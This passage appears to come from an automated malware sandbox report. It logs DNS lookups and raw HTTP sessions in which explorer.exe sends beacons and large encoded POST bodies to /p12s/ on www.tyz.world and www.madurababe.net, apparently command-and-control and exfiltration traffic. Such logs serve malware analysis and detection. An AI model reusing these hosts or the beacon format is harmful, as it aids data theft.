                                    May 14, 2022 11:56:05.055722952 CEST5015253192.168.2.38.8.8.8
                                    May 14, 2022 11:56:05.079689980 CEST53501528.8.8.8192.168.2.3

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    May 14, 2022 11:55:46.587146044 CEST192.168.2.38.8.8.80x4b2dStandard query (0)www.tyz.worldA (IP address)IN (0x0001)
                                    May 14, 2022 11:56:05.055722952 CEST192.168.2.38.8.8.80x36b5Standard query (0)www.madurababe.netA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    May 14, 2022 11:55:46.636457920 CEST8.8.8.8192.168.2.30x4b2dNo error (0)www.tyz.worldtyz.worldCNAME (Canonical name)IN (0x0001)
                                    May 14, 2022 11:55:46.636457920 CEST8.8.8.8192.168.2.30x4b2dNo error (0)tyz.world34.102.136.180A (IP address)IN (0x0001)
                                    May 14, 2022 11:56:05.079689980 CEST8.8.8.8192.168.2.30x36b5No error (0)www.madurababe.net188.114.97.10A (IP address)IN (0x0001)
                                    May 14, 2022 11:56:05.079689980 CEST8.8.8.8192.168.2.30x36b5No error (0)www.madurababe.net188.114.96.10A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • www.tyz.world
                                    • www.madurababe.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34981034.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:55:46.696173906 CEST10867OUTGET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1
                                    Host: www.tyz.world
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 14, 2022 11:55:46.808926105 CEST10868INHTTP/1.1 403 Forbidden
                                    Server: openresty
                                    Date: Sat, 14 May 2022 09:55:46 GMT
                                    Content-Type: text/html
                                    Content-Length: 291
                                    ETag: "627e7264-123"
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34981134.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:55:48.880199909 CEST10869OUTPOST /p12s/ HTTP/1.1
                                    Host: www.tyz.world
                                    Connection: close
                                    Content-Length: 408
                                    Cache-Control: no-cache
                                    Origin: http://www.tyz.world
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.tyz.world/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
                                    Data Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00
                                    Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
                                    May 14, 2022 11:55:48.993570089 CEST11023INHTTP/1.1 405 Not Allowed
                                    Server: openresty
                                    Date: Sat, 14 May 2022 09:55:48 GMT
                                    Content-Type: text/html
                                    Content-Length: 154
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CZSy2LJoIDizRMKEnV+GvgxGcf91vjvF3b9piDC3xboCYxr5eBm+yI3Ho5/bWevm+hsCTi0lgKoiAWFoTINoQA
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.34981234.102.136.18080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:55:48.901112080 CEST10883OUTPOST /p12s/ HTTP/1.1
                                    Host: www.tyz.world
                                    Connection: close
                                    Content-Length: 148780
                                    Cache-Control: no-cache
                                    Origin: http://www.tyz.world
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.tyz.world/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
                                    Data Raw: 33 66 3d 30 49 71 32 49 72 46 49 30 70 6f 35 78 42 7e 5f 70 5a 6f 46 76 4c 42 39 6b 58 59 66 34 56 76 56 6e 6b 6b 36 6b 6d 4a 53 39 63 78 4a 54 6f 53 46 51 39 62 78 77 36 36 65 6c 62 66 52 70 72 74 4e 37 79 55 35 59 68 28 66 38 47 77 4d 51 66 43 6d 74 69 30 4e 38 31 74 51 28 70 32 50 56 68 30 38 71 37 4c 4b 39 48 4c 49 49 6b 7e 51 6c 5a 73 33 32 35 48 77 4d 6d 6d 67 46 52 62 54 6c 31 78 35 65 5f 6e 68 71 4c 79 32 57 6a 6f 2d 55 67 48 33 73 45 55 58 78 73 35 4b 72 46 48 71 62 30 55 63 47 30 39 69 59 4e 32 30 6f 5f 6f 35 41 4c 7e 77 49 4d 72 30 36 77 65 54 36 59 6f 6a 34 76 31 71 4f 70 42 51 53 6b 76 67 57 78 72 32 67 45 69 58 7e 44 4c 2d 79 57 47 51 7e 70 73 51 4b 31 57 64 4f 45 71 37 71 75 67 42 45 44 37 63 55 7a 57 58 67 76 45 32 53 34 6c 7a 4e 46 35 55 35 58 78 64 4f 56 31 42 79 73 77 2d 48 43 4a 66 58 62 47 6f 78 64 76 52 55 7a 28 36 74 46 44 4e 32 64 35 37 36 53 64 4c 76 73 50 71 4b 68 41 4e 6a 51 6e 79 73 32 43 53 38 43 33 48 7a 68 45 6e 73 69 4a 73 4c 6c 28 66 32 6d 44 55 58 4c 4d 75 4d 68 4b 76 58 58 75 4e 51 57 77 59 64 6a 61 55 63 54 53 41 56 41 75 6e 64 61 64 52 77 44 44 4e 45 4d 70 59 69 38 77 61 77 4f 47 48 44 55 73 4c 7a 5a 52 49 52 48 37 37 62 38 5a 67 6d 2d 6b 37 63 78 49 37 69 38 5a 48 65 36 49 68 6c 35 78 56 78 69 68 53 6e 5f 6d 6a 78 75 28 5a 59 4b 52 36 4c 6f 70 4a 67 30 37 59 42 51 4a 4a 51 76 39 59 71 49 36 35 67 78 4e 58 6c 30 74 7a 32 75 4d 4b 62 33 55 33 70 71 59 35 74 6d 46 6f 6d 36 52 38 54 41 37 38 6f 47 77 4a 56 4f 65 66 74 41 6e 79 64 4b 52 39 56 47 72 31 4e 66 76 42 41 52 56 6d 45 75 45 54 52 48 35 41 6f 30 33 4e 53 36 5a 46 30 4d 6d 52 47 72 55 65 5a 63 78 76 55 63 49 66 71 4c 44 77 76 44 59 78 68 48 35 70 5a 6c 74 75 28 4c 45 36 4e 52 47 63 72 32 67 65 6c 66 44 45 45 46 69 51 31 48 6a 57 65 69 6d 6a 56 52 74 75 59 2d 33 58 38 43 52 43 38 4c 4b 78 6d 4b 59 48 72 76 7a 78 28 78 7e 39 64 5f 71 70 50 65 30 50 33 6e 45 6d 50 74 4e 69 46 34 77 2d 43 56 46 2d 68 74 65 5a 69 6f 38 31 79 66 39 69 47 4b 41 57 41 79 33 50 41 30 34 54 75 31 28 4b 30 58 43 69 78 71 49 6f 67 4f 4f 56 52 57 45 5a 57 42 52 4c 79 41 59 69 39 38 54 30 63 37 73 54 41 53 6b 4a 30 65 65 70 43 56 7a 43 70 73 79 7a 28 6f 76 67 56 42 56 48 78 49 42 65 59 36 70 69 5a 5a 71 48 45 45 77 33 73 37 78 4f 53 7a 54 5f 34 70 42 68 74 57 37 37 6b 38 4d 74 6f 62 42 35 28 44 71 47 6f 4d 36 7a 39 56 54 77 38 54 74 5a 4e 42 67 4b 78 74 47 69 44 78 6d 4a 62 48 37 58 76 54 71 64 42 5a 42 50 5a 48 58 76 67 52 39 71 39 64 37 4f 56 73 6c 44 35 4d 4d 54 57 66 47 4e 37 66 50 75 56 52 69 74 76 32 58 5f 76 4b 4a 49 48 69 45 44 4a 49 77 5a 56 70 78 48 30 58 6e 31 59 54 32 4e 71 64 53 66 6b 41 4e 44 4c 6b 4f 6f 66 4d 28 58 49 46 71 4c 50 47 79 68 31 6d 66 52 70 31 6b 6d 64 43 69 55 4f 4b 67 35 36 73 36 54 36 57 66 75 6b 4c 30 78 68 6c 30 73 74 2d 6e 48 54 36 42 37 50 46 6b 38 69 54 31 74 31 75 63 75 72 4b 30 6f 7a 54 34 6f 50 79 34 44 76 4a 75 56 77 6a 53 67 78 49 76 76 42 58 62 32 42 47 6c 51 7a 37 59 71 56 35 6f 65 35 48 7e 56 31 67 4f 36 50 75 72 70 38 59 53 72 32 34 7e 5f 74 50 54 57 68 47 44 6d 59 59 45 74 78 4e 50 4a 33 5a 6c 67 71 78 75 48 55 4e 46 31 66 55 77 43 58 48 76 4a 41 48 75 6d 59 71 55 4f 47 30 72 4e 30 2d 6e 44 32 50 66 4f 61 4b 47 48 76 78 43 43 37 69 45 78 65 59 34 50 35 6e 34 49 35 74 5a 50 47 72 36 45 71 65 33 75 31 36 74 6d 33 39 45 35 75 7a 4d 77 70 6f 65 31 49 63 72 46 65 49 69 58 46 6a 30 41 64 72 73 7a 62 36 6f 53 7a 57 76 79 38 70 6b 64 37 74 70 31 57 55 39 71 33 7a 43 6e 59 57 31 35 61 2d 4a 51 6f 74 7e 4e 54 4e 4f 54 4b 6c 47 72 54 54 63 5a 7a 44 56 33 46 77 70 54 56 53 6e 42 70 71 43 6f 63 2d 61 45 71 7a 34 38 35 49 6c 53 33 33 41 58 38 61 71 57 4d 39 6c 43 7a 59 53 71 46 48 66 72 48 50 41 47 6d 61 67 45 63 41 70 53 6f 31 6a 5f 66 6a 65 34 4d 5f 46 34 5a 52 65 58 30 7a 7e 35 66 78 39 41 69 50 38 62 79 6c 28 54 76 75 79 4f 6e 5a 33 53 44 79 74 39 31 48 67 46 55 79 5a 6a 67 52 75 38 69 58 6e 39 67 59 68 6f 64 78 28 4a 68 61 6f 6e 7a 70 35 38 31 30 58 51 52 56 6e 79 74 67 75 48 36 54 32 45 42 33 59 6d 4c 45 78 48 74 56 45 4a 4d 78 48 34 5a 59 4c 5f 65 55 4a 4d 39 32 62 43 55 49 49 59 77 73 37 6e 55 49 79 74 4d 5a 51 70
                                    Data Ascii: 3f=0Iq2IrFI0po5xB~_pZoFvLB9kXYf4VvVnkk6kmJS9cxJToSFQ9bxw66elbfRprtN7yU5Yh(f8GwMQfCmti0N81tQ(p2PVh08q7LK9HLIIk~QlZs325HwMmmgFRbTl1x5e_nhqLy2Wjo-UgH3sEUXxs5KrFHqb0UcG09iYN20o_o5AL~wIMr06weT6Yoj4v1qOpBQSkvgWxr2gEiX~DL-yWGQ~psQK1WdOEq7qugBED7cUzWXgvE2S4lzNF5U5XxdOV1Bysw-HCJfXbGoxdvRUz(6tFDN2d576SdLvsPqKhANjQnys2CS8C3HzhEnsiJsLl(f2mDUXLMuMhKvXXuNQWwYdjaUcTSAVAundadRwDDNEMpYi8wawOGHDUsLzZRIRH77b8Zgm-k7cxI7i8ZHe6Ihl5xVxihSn_mjxu(ZYKR6LopJg07YBQJJQv9YqI65gxNXl0tz2uMKb3U3pqY5tmFom6R8TA78oGwJVOeftAnydKR9VGr1NfvBARVmEuETRH5Ao03NS6ZF0MmRGrUeZcxvUcIfqLDwvDYxhH5pZltu(LE6NRGcr2gelfDEEFiQ1HjWeimjVRtuY-3X8CRC8LKxmKYHrvzx(x~9d_qpPe0P3nEmPtNiF4w-CVF-hteZio81yf9iGKAWAy3PA04Tu1(K0XCixqIogOOVRWEZWBRLyAYi98T0c7sTASkJ0eepCVzCpsyz(ovgVBVHxIBeY6piZZqHEEw3s7xOSzT_4pBhtW77k8MtobB5(DqGoM6z9VTw8TtZNBgKxtGiDxmJbH7XvTqdBZBPZHXvgR9q9d7OVslD5MMTWfGN7fPuVRitv2X_vKJIHiEDJIwZVpxH0Xn1YT2NqdSfkANDLkOofM(XIFqLPGyh1mfRp1kmdCiUOKg56s6T6WfukL0xhl0st-nHT6B7PFk8iT1t1ucurK0ozT4oPy4DvJuVwjSgxIvvBXb2BGlQz7YqV5oe5H~V1gO6Purp8YSr24~_tPTWhGDmYYEtxNPJ3ZlgqxuHUNF1fUwCXHvJAHumYqUOG0rN0-nD2PfOaKGHvxCC7iExeY4P5n4I5tZPGr6Eqe3u16tm39E5uzMwpoe1IcrFeIiXFj0Adrszb6oSzWvy8pkd7tp1WU9q3zCnYW15a-JQot~NTNOTKlGrTTcZzDV3FwpTVSnBpqCoc-aEqz485IlS33AX8aqWM9lCzYSqFHfrHPAGmagEcApSo1j_fje4M_F4ZReX0z~5fx9AiP8byl(TvuyOnZ3SDyt91HgFUyZjgRu8iXn9gYhodx(Jhaonzp5810XQRVnytguH6T2EB3YmLExHtVEJMxH4ZYL_eUJM92bCUIIYws7nUIytMZQpgO1x9VSrhr(MHmiWbHEMG6LsCUHksfpSmVqIliu72Kkb3glMTyYf4P(ogoicN6tjEbEqv845omXU5EU_SQsAUWGfxs0SG_pXgcfN710Uhh4O4dJNYokow6hlZy2a8YCsUsOFRpPLMw8OFVONvv(4rSGcweis(L5h5cO-25wckAEDKl83b4pRevRps1cXULW7zkv5o-h7GRZHvt(-Fb(kPxdkq1XuLTM2ZWyXuR5AlucAIqZLLsQrfsBPcvvQdaX-X4ilY4InDUt4KV(y~SM94MQXm9GG~XobZihQXnnJ3d6lna5eewMyACfpfNpSe5s-wHi1lVSu9HED1rEoD0zkbetPIO3zKRLgn8ceNKIooSr91DQNf_CZjg7FGz6ACrihkv6iJ6G84Q3QUQBGsaGeJq9navOEYyJGXQpYUP0w4UZ_JWyXMbXHC1zo5gTGRBAUplQWQg7S00ZSN579CFH8xz8rXwxc(ICu(6KaLcbAwHPY3okDhJQCjtLM0wj4jWg2lKrTFrBVRibBTQ4ngk5q5RenITU7JPmYzYj5d_oRASUYu3MGd-P4YOupTey3uzYe0_VvrdYweMA2PVsPxKX-7ZhlqfKoJnECG-MTcej09J(Wddf21ShkPKjOaN8KikN4z8Ts5potVQMuY93Rfhr0ga2aV0VFSxsrYD2rIjjdYxVHuc~M11pwydEVHE3Z3wmCIEFnSKQcsthooQWJCiKYv-O26nQ5B94lccsvw-IkVRQRhn9oa5t-Z4yu(H3aKFZ0~lmm(Wor07SHVp(Zk5z_gjfzgc76dkCS9scrQy8VAK5jkcZPMX3f8pSZju22Co~56bRV1DMNAzBXHIFWG8qrmtPOfgWaENzmGEf9MTwFc74Y0jcG2wuTUw1CM41lS0IF2Of_poc66UJaud79U9zUwrVPoYrJ2ioDpq(OY5yBKgH8KetFLJC_yjh4VVFlesep3wLkqT4cmYNLU21PGVWwX0oDsU~RyfQU6RTC6Qh0a-g3xMmkkzyfk65XurandQdbM1J5c6lkZumrYbNPlJlXdvCb9fCJ730WMSzqIp~08s(F12xoGClE(694U03oRi08FuX7hi4V70w4VKUxnLLMo1ZTqwkkDPq7lsNzORoc4NN9LAVBVIPxGFn4(mbT0HJbC03ZTL(YFkXtcps9Ua0EtATrNnUKyZFUqkB-yuSJJ1u6XZUOEz2pr_5lMGTUMa3pzBzMAGKO(qfyj8yLUN1OEb5k~LvUyew5Nf9d0daBAbJmTKmkuxPCfXx6rIN4UTpAwDjQnV2TgRORHQrR1BJiK2Hu(GhmuBhilviDTTNZTW3Vu4MO9kPow4JTqSOP25q4TjBar88M(6yWJIPr(yEtyR8wTN27OZE9kaPz85sFmPnu6rqLx3w5BOwdAEamTCDYl3BrmZl92ZyoMAeiwW(06nsvzJneSvVRVeoIILic2jo8zTrjyg1ULRywE0hCGU2-8bFIufS-3i2GSA6YGQjsFeDQvOZg9RKrV82ticiZE9fNTyZPTJb55iXAsMpt8qWVMNslQZPndyIF8VK3IcPMJ2Dosrcv6C3u~S(dxpll6tgKMcq3RbHZhS8n1Cz5EZdEKKxSfh2LMGs2GCGQOYIzoKFDd0FvGO9l5uNktpz9SMssBeZfGuHIapPQjQ6ysXR36U~8upTgg6LuAviyOGAicSxPEdfdhxEjkAxI0hIH9umONQZogYDnV_kZQnecP4noeOKw5XX88AXTimuQHOSYC8bvSmowDtHB~qZXu-TbOjABjGozlbM_uCPr1vVtr8L96nthnq4XnDu1Mfop2krlKfI0IOr_GoXvKjKYcm1Ik2TCIVcq8IGaUFeuSYufWT5d4sX_brAmPWxSa1AhwuDWFlVV9ecUKmaOJqFD4Z6nsr6fMhvPQKHERU5BlioAguiHMlWtWunZPnKGYTYkAYfq9vAA1uV_cYbqWE1iNA(YDVnq9kNODUwyXKYGeOBXIcO6iMfMxWKweLSiR4ZSsNOkJ1ptuMOdk5H0FY426WEyLAHqis63Kg6OtkVw8wIZc4sIc1J70vknPTJVUqIs~KAQCCiUd8evgiB264baUk2Eupn3y-QIblsfsYTOywOX96wT(glPOqp9dNVndsyIi47MNNhtEirKNDMGgfV4LfTy1UJokiiH~cK4okfzUiFtFPmmKdi6eel5undPvELFT99OrQQfdVtPdxys9u4AFptKPujCda46zM3dL-72MdJacO7S8tuGF4n7DqrfPEbm2Z8Ti4NkDwyjIBdZ~ap8jza0ThY0Fgcsv3dTRYG5a8PH3opwwaW4i9hR~NpYf9~PBp7LWJzwOrk8TpGCUygExlv5T-R4n390fqPcHeLswZZvc0Kh(XyxrBwBQdDsnb(IJ_QpkE77lH28yyqsFVsypg9gN6xyCrqMvOI1HftD8YDtkLjs20Jgx6o8DZB2WdCI~I30jKNOBiNKZSr4IqcRlTk1cjT3gndf4G(vm4b1ZTNWOMtIx2NeOO6-6-hunukaD3eKBrV9V85btb3pSsBSsqZCIOiAS-e1AIUnlV~-ycSd8YXK2pJ_KOiRk3(R8E1NNbhN7NZvmdazxHjCaHMQCEkw6BGbhXB-yC6Y1qcwQBotok~Krf5KrXftWxEqajoa2IVyy56RYW44p6F1ynoXg4~qusmv~XdIf76VIBVPhKKCm1vOs1Y45GIX48jJ~9xtHOdDPZb9ML8vz9~tKAp
                                    May 14, 2022 11:55:49.015769005 CEST11024INHTTP/1.1 405 Not Allowed
                                    Server: openresty
                                    Date: Sat, 14 May 2022 09:55:48 GMT
                                    Content-Type: text/html
                                    Content-Length: 154
                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CZSy2LJoIDizRMKEnV+GvgxGcf91vjvF3b9piDC3xboCYxr5eBm+yI3Ho5/bWevm+hsCTi0lgKoiAWFoTINoQA
                                    Via: 1.1 google
                                    Connection: close
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    3192.168.2.349839188.114.97.1080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:56:05.097192049 CEST11089OUTGET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 14, 2022 11:56:05.127767086 CEST11089INHTTP/1.1 301 Moved Permanently
                                    Date: Sat, 14 May 2022 09:56:05 GMT
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Cache-Control: max-age=3600
                                    Expires: Sat, 14 May 2022 10:56:05 GMT
                                    Location: https://www.madurababe.net/p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bSMAVbyB%2FDhTtSqJ0%2BXRULTS9tdHFfG4hOzsi1PPheIwfR8%2B82SzXLEVuFCSbdiyFgb1jkypFeKeGdo8WTDEVYaHDrU%2BwEc8wNlcXGqhuZGxKWI%2BbLOBz%2BTKWXWMW1B3J0GzDyc%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 70b2c30be83f9945-FRA
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    4192.168.2.349840188.114.97.1080C:\Windows\explorer.exe
                                    TimestampkBytes transferredDirectionData
                                    May 14, 2022 11:56:07.157748938 CEST11091OUTPOST /p12s/ HTTP/1.1
                                    Host: www.madurababe.net
                                    Connection: close
                                    Content-Length: 408
                                    Cache-Control: no-cache
                                    Origin: http://www.madurababe.net
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://www.madurababe.net/p12s/
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate
                                    Data Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00
